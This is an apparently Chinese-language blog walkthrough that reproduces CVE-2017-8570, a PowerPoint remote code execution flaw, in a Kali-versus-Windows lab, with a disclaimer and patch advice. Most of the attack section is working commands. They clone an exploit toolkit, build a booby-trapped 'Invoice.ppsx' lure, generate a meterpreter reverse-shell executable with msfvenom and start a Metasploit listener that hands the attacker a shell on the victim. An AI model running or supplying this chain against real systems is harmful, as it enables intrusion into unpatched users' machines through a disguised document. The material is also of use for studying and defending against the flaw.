CVE-2017-8570(Office远程代码执行)
CVE-2017-8570(Office远程代码执行)
免责声明:
此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。
漏洞概述:
2017年7月,微软在例行的月度补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上已经出现该漏洞的利用代码,影响范围较广。
该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象,而在PowerPoint播放动画期间会**该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以欺骗用户运行含有该漏洞的PPT文件,导致获取和当前登录用户相同的代码执行权限。
影响范围:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
环境搭建:
Kali(攻击机 IP:192.168.110.132)
Windows10(目标机Office 2016 IP:192.168.110.136)
复现:
1.下载漏洞利用脚本,使用Kali,通过git clone命令下载脚本
git clone https://github.com/tezukanice/Office8570.git
2.生成恶意的ppsx文件,这里文件内是有个template.ppsx文件,我们需要新建一个template文件夹,将template.ppsx放到该文件夹内
mkdir template
mv template.ppsx template/template.ppsx
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.110.132/logo.doc
3.使用msf生成反弹shell的exe文件,这里的payload如果是64位操作系统的话是需要加x64,否则不加
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.110.132 LPORT=8888 -f exe > shell.exe
4.使用python通过脚本在80端口监听,等待接收并下载shell.exe文件
python cve-2017-8570_toolkit.py -M exp -e http://192.168.110.132/shell.exe -l shell.exe
5.使用msf监听,添加payload、监听主机、监听端口,运行
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp ##64位操作系统,否则不加
set lhost 192.168.110.132
set lport 8888
exploit
6.将Invoice.ppsx发给目标机,目标机打开则会下载shell.exe,然后会返回一个meterpreter,获取到shell
修复建议:
及时安装相应版本的补丁
不要打开任何来源不明的office文件
推荐阅读
-
网站漏洞修复之Discuz X3.4远程代码执行漏洞
-
ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
-
网站漏洞检测 squid反向代理存在远程代码执行漏洞
-
linux expect实现登陆远程主机并执行命令示例代码
-
java执行python代码(java远程调用python脚本讲解)
-
CVE-2019-1181 RDP协议漏洞导致执行远程代码 修复
-
java执行python代码(java远程调用python脚本讲解)
-
Discuz! ML远程代码执行(CVE-2019-13956)
-
Windows CVE-2019-0708 远程桌面代码执行漏洞复现
-
齐博cms最新SQL注入网站漏洞 可远程执行代码提权